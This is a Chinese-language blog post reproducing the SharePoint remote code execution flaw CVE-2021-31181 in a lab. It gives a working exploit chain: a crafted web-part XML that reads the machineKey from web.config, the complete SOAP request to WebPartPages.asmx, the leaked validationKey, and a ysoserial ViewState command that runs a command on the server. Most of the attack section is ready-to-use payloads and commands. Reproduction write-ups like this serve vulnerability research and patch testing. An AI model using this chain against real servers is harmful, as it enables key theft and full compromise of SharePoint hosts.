SharePoint CVE-2021-31181 复现

复现

需要一个用户，我这使用的是域管理员账号+SharePoint2016

先要创建team site，在sp2016里是创建网站集，我创建一个名为ts的网站集

http://sharepoint:8080/\_admin/createsite.aspx

image.png

然后看poc的xml中

`<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>` `<%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%>` `<WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="Documents" WebId="{6e7040c8-0338-4448-914d-a7061e0fc347}"> ``   <DataSources>  ``     <att:xmldatasource runat="server" id="XDS1"  ``       XPath="/configuration/system.web/machineKey"  ``       datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config" />  ``   </DataSources>  ``   <xsl>  ``       <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">           ``           <xsl:output method="xml" indent="yes"/>  ``           <xsl:template match="/" >  ``           <xsl:copy-of select="."/>  ``           </xsl:template>  ``       </xsl:stylesheet>  ``</xsl>` `</WebPartPages:XsltListFormWebPart>`

需要三个参数

1.ListDisplayName2.WebId3.datafile

WebId来自 http://sharepoint/sites/ts/\_api/web/id

image.png

e89c64e5-75ce-4bd4-8181-2298228fc91f

ListDisplayName可以新建一个

image.png

image.png

然后ListDisplayName为test

第三个参数datafile是要读取的web.config文件，这个c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config中80对应的端口号，但是有的情况特殊可以试试C:\inetpub\wwwroot\web.config

比如我搭建的sp，8080管理端口对应的是38040

image.png

然后读web.config，构造的xml

`<%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>` `<%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%>` `<WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="test" WebId="{e89c64e5-75ce-4bd4-8181-2298228fc91f}"> ``   <DataSources>  ``     <att:xmldatasource runat="server" id="XDS1"  ``       XPath="/configuration/system.web/machineKey"  ``       datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config" />  ``   </DataSources>  ``   <xsl>  ``       <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">           ``           <xsl:output method="xml" indent="yes"/>  ``           <xsl:template match="/" >  ``           <xsl:copy-of select="."/>  ``           </xsl:template>  ``       </xsl:stylesheet>  ``</xsl>` `</WebPartPages:XsltListFormWebPart>`

html编码之后http请求

`POST /sites/ts/_vti_bin/WebPartPages.asmx HTTP/1.1``Host: sharepoint``Content-Type: text/xml; charset=utf-8``Content-Length: 6527``SOAPAction: "http://microsoft.com/sharepoint/webpartpages/RenderWebPartForEdit"``   ``<?xml version="1.0" encoding="utf-8"?>``<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">`  `<soap:Body>`    `<RenderWebPartForEdit xmlns="http://microsoft.com/sharepoint/webpartpages">`      `<webPartXml><%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%> <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="test" WebId="{e89c64e5-75ce-4bd4-8181-2298228fc91f}">   <DataSources>     <att:xmldatasource runat="server" id="XDS1"       XPath="/configuration/system.web/machineKey"       datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config" />   </DataSources>   <xsl>       <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">                    <xsl:output method="xml" indent="yes"/>           <xsl:template match="/" >           <xsl:copy-of select="."/>           </xsl:template>       </xsl:stylesheet>   </xsl> </WebPartPages:XsltListFormWebPart></webPartXml>`    `</RenderWebPartForEdit>`  `</soap:Body>``</soap:Envelope>`

image.png

拿到validationKey E8184ADCEE3E6FD39E35B44AC344F88C2581F9F022BF7661F223DBD4EB3F9316

然后ysoserial构造viewstate，查看源代码 http://sharepoint/sites/ts/\_layouts/15/success.aspx 拿到 __VIEWSTATEGENERATOR AF878507

image.png

命令

.\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd.exe /c calc" --generator="AF878507" --validationkey="E8184ADCEE3E6FD39E35B44AC344F88C2581F9F022BF7661F223DBD4EB3F9316" --validationalg="HMACSHA256" --islegacy --minify

发包就RCE了

但是我这边用c:/inetpub/wwwroot/wss/VirtualDirectories/38040/web.config不行，用c:/inetpub/wwwroot/web.config 就可以了。

image.png

image.png

参考

https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability

分享、点赞、在看就是对我们的一种支持！